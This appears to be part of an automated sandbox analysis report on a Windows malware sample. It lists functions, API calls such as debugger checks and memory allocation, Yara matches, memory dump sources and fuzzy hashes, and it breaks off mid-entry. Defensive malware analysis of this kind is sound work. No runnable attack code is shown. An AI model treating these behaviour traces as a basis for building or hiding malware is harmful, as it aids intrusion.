                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                    • Opcode ID: c253e0727d80d8429a7a73fb42e541ec6f58d2ad2c2bb38e12cc504904b79bca
                                                                                                                                                    • Instruction ID: 5d0714d22cc6686e1ab62a0dbcbf3a22e941fece44ef81d0d1092e41f6f309e0
                                                                                                                                                    • Opcode Fuzzy Hash: c253e0727d80d8429a7a73fb42e541ec6f58d2ad2c2bb38e12cc504904b79bca
                                                                                                                                                    • Instruction Fuzzy Hash: 8BC09B74575110FBC7052B216C947413EA0F75C707F404673E44055161D77414105BFC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AE12B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 181 4ae12b-4ae13e GlobalAlloc
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,004AE7A2), ref: 004AE133
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                    • Opcode ID: 4a1db7f479f41e93435e59f703d8f89029b2c1aeb99e4d9110efbb9d65f75c79
                                                                                                                                                    • Instruction ID: 42068f560c014093e11e99ad75ae35384029a9fa08a637d15dd0e03985a8e180
                                                                                                                                                    • Opcode Fuzzy Hash: 4a1db7f479f41e93435e59f703d8f89029b2c1aeb99e4d9110efbb9d65f75c79
                                                                                                                                                    • Instruction Fuzzy Hash: 0BB01270412200ABC7011F50AC847003E70B34C302F000370E50041170D73000109F98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 00413471 Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___getlocaleinfo
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1937885557-0
                                                                                                                                                    • Opcode ID: 99d552cce3e088c032ceea63a3219711a7aa95c77506e2d4aceac830b624defc
                                                                                                                                                    • Instruction ID: fd581192dad7d81ba5328bb40ca189f417fc67cd28976eb129a74255c2bee843
                                                                                                                                                    • Opcode Fuzzy Hash: 99d552cce3e088c032ceea63a3219711a7aa95c77506e2d4aceac830b624defc
                                                                                                                                                    • Instruction Fuzzy Hash: 3AE1DFB290021DFEFB12DAE1CD41DFF77BDEB08748F04052EB215E2041EAB8AA559764
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0228F030 Relevance: 19.9, APIs: 10, Strings: 1, Instructions: 696COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$_free_malloc_strstr$_wcsstr
                                                                                                                                                    • String ID: "
                                                                                                                                                    • API String ID: 430003804-123907689
                                                                                                                                                    • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                                                                    • Instruction ID: 9d209c00ea49cd9954a72204d41a73cd1885219317ce974de6a95ee5d2726706
                                                                                                                                                    • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                                                                    • Instruction Fuzzy Hash: 3D420471519381AFDB20EFA4CC48B9B7BE8BF45308F44052DF98997195DB74D109CBA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0228A930 Relevance: 10.3, APIs: 3, Strings: 2, Instructions: 1565COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: <$x2Q
                                                                                                                                                    • API String ID: 2102423945-643667464
                                                                                                                                                    • Opcode ID: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                                                                                                                                                    • Instruction ID: fd7d0126c85078192f18462b3d12c8e0f9f86e18374b615978ba2e8446adf318
                                                                                                                                                    • Opcode Fuzzy Hash: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                                                                                                                                                    • Instruction Fuzzy Hash: 47D2DF715293419BDB14FFA0D894B9BBBE6BF94308F00092DE485972D4EB71E509CF92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 022800D0 Relevance: 9.7, APIs: 6, Instructions: 732COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                                                                    • Instruction ID: d4affa381de00611c0d63b5327794b373fd7aa10b540cdc14af52fc65571f02b
                                                                                                                                                    • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                                                                    • Instruction Fuzzy Hash: 3E527D71D21209DBDF10EFE8C884BDEB7B5BF04308F148169D419A7298E775AA49CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227E6E0 Relevance: 8.2, APIs: 5, Instructions: 735COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0227E72D
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0227E756
                                                                                                                                                    • _memset.LIBCMT ref: 0227E784
                                                                                                                                                      • Part of subcall function 022BFC0C: std::exception::exception.LIBCMT ref: 022BFC1F
                                                                                                                                                      • Part of subcall function 022BFC0C: __CxxThrowException@8.LIBCMT ref: 022BFC34
                                                                                                                                                      • Part of subcall function 022BFC0C: std::exception::exception.LIBCMT ref: 022BFC4D
                                                                                                                                                      • Part of subcall function 022BFC0C: __CxxThrowException@8.LIBCMT ref: 022BFC62
                                                                                                                                                      • Part of subcall function 022BFC0C: std::regex_error::regex_error.LIBCPMT ref: 022BFC74
                                                                                                                                                      • Part of subcall function 022BFC0C: __CxxThrowException@8.LIBCMT ref: 022BFC82
                                                                                                                                                      • Part of subcall function 022BFC0C: std::exception::exception.LIBCMT ref: 022BFC9B
                                                                                                                                                      • Part of subcall function 022BFC0C: __CxxThrowException@8.LIBCMT ref: 022BFCB0
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0227EA0C
                                                                                                                                                    • _memset.LIBCMT ref: 0227EE5C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1338678108-0
                                                                                                                                                    • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                                                                    • Instruction ID: b17cedd8374abaca815d408cb543b3443e71e72aaf756308e7c3e24994e235cd
                                                                                                                                                    • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                                                                    • Instruction Fuzzy Hash: 0552FF71A1430ADFCF24CFA8C884BAEBBF5BF04304F1545A9E806AB285D7719945CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401136 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00401E12
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401E27
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(004B5240), ref: 00401E32
                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00401E4E
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00401E55
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                    • Opcode ID: 91e45e12686cdd9564e93ea7a2372b55c680915a4e035d338c968184780ce478
                                                                                                                                                    • Instruction ID: 04dde37b2d4cc6f2d579826a0101f8eaac41410ea5b0ccfbf76c7ad74558bf8f
                                                                                                                                                    • Opcode Fuzzy Hash: 91e45e12686cdd9564e93ea7a2372b55c680915a4e035d338c968184780ce478
                                                                                                                                                    • Instruction Fuzzy Hash: 8721BDB4801208DFC711EF69ED696547BA8FB08384F50463AEA089B2A0E7F559809F9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02280B00 Relevance: 6.7, APIs: 4, Instructions: 660COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                                                                    • Instruction ID: 7168396bcb5c2d1c40f7cdf1c50c0a6f5dd495fde11f8d2b4d1c115f09c1689c
                                                                                                                                                    • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                                                                    • Instruction Fuzzy Hash: 57428B71D21209DBDF14EFE4C844BEEB7B5BF04308F244169D819A7294EB71AA19CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227DBE0 Relevance: 5.2, APIs: 3, Instructions: 702COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                    • Instruction ID: 7854618460d394913d8f2b3e7416c72a9a81aeb1efc55affe090205b99beef7f
                                                                                                                                                    • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                    • Instruction Fuzzy Hash: DC526F70E14249DFDB10DFA4C884FAEBBB5BF49704F1481D8E909AB294DB74AD45CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415B47 Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _strlen.LIBCMT ref: 00415B47
                                                                                                                                                    • EnumSystemLocalesA.KERNEL32(Function_000157A5,00000001), ref: 00415B5F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumLocalesSystem_strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 216762292-0
                                                                                                                                                    • Opcode ID: a65749d1b861c135fc4e7ecb9dc1179be6f7502a402491ed3217aa353630c460
                                                                                                                                                    • Instruction ID: 08d5395049a390515fdf3207d9ef9b7111c7c11c5391ff9477a16ff010f1f695
                                                                                                                                                    • Opcode Fuzzy Hash: a65749d1b861c135fc4e7ecb9dc1179be6f7502a402491ed3217aa353630c460
                                                                                                                                                    • Instruction Fuzzy Hash: 8AD0A7B0E24B068AE7208F34C6097A177D0DB40B05F50861DD857C44C0C7BD90848108
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 022F22C0 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $
                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                    • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                                                                    • Instruction ID: 36811492ce43b80aa4d8eae7ee3e1a81637f4c2f31be9015a936e7dfb247dac3
                                                                                                                                                    • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                                                                    • Instruction Fuzzy Hash: DD3250B0E103299ADF619FA4CC44BAEB779FF45704F1042FAEA0CA6154DB758A80CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041A73D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?), ref: 0041A74E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                    • Opcode ID: 32561a1f6983d8ceb3f9ebb47f3c0bf1d2bf47b9370b89bc1eb82e4365a95dc9
                                                                                                                                                    • Instruction ID: dc8c03624d1bfe949be37e58704b51a11b797b94ef407aaf20a96c49c57ff004
                                                                                                                                                    • Opcode Fuzzy Hash: 32561a1f6983d8ceb3f9ebb47f3c0bf1d2bf47b9370b89bc1eb82e4365a95dc9
                                                                                                                                                    • Instruction Fuzzy Hash: 18C0013200028DBB8F025F8AEC0899A7F2AEB88261B148020FA28050208B329971AB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040AA42 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000AA00), ref: 0040AA47
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: 2b301f9251c0f73e309323b36865459012df31fef4174b3b4a6f4939f9c9f957
                                                                                                                                                    • Instruction ID: 925e7b7867d656cd761629f8f10e3f652bb9532b3ee3e714625836c408d297d1
                                                                                                                                                    • Opcode Fuzzy Hash: 2b301f9251c0f73e309323b36865459012df31fef4174b3b4a6f4939f9c9f957
                                                                                                                                                    • Instruction Fuzzy Hash: 3990026035564447860127705D1DB0565916A48707BA10571A406D40D4EE644010A95A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02275DF7 Relevance: .7, Instructions: 723COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                                                                    • Instruction ID: ac996d4423360cf5bf9f663df6d2223256dcd925d1e77719c10b6b7d2359fb02
                                                                                                                                                    • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                                                                    • Instruction Fuzzy Hash: CD42B071629F158BC3DADF24C88055BF3E1FFC8218F048A1DD99997A94DB38F819CA91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227A026 Relevance: .5, Instructions: 478COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                                                                    • Instruction ID: 5a48bf178b7ec198caceff25b20dcb22059a61685c27198997fdf79bac16d6d2
                                                                                                                                                    • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                                                                    • Instruction Fuzzy Hash: 0F22E076918B128FC714CF19D08065AF7E1FF88324F158A6EE8A9A7B14D730BA55CF81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02272B60 Relevance: .4, Instructions: 443COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                                                                    • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                                                                                                                    • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                                                                    • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041844F Relevance: .4, Instructions: 384COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                    • Instruction ID: 3f389b74755fc8b566f27a858c6006089faeb7c9ac75043fc74b914c0cb45dcb
                                                                                                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
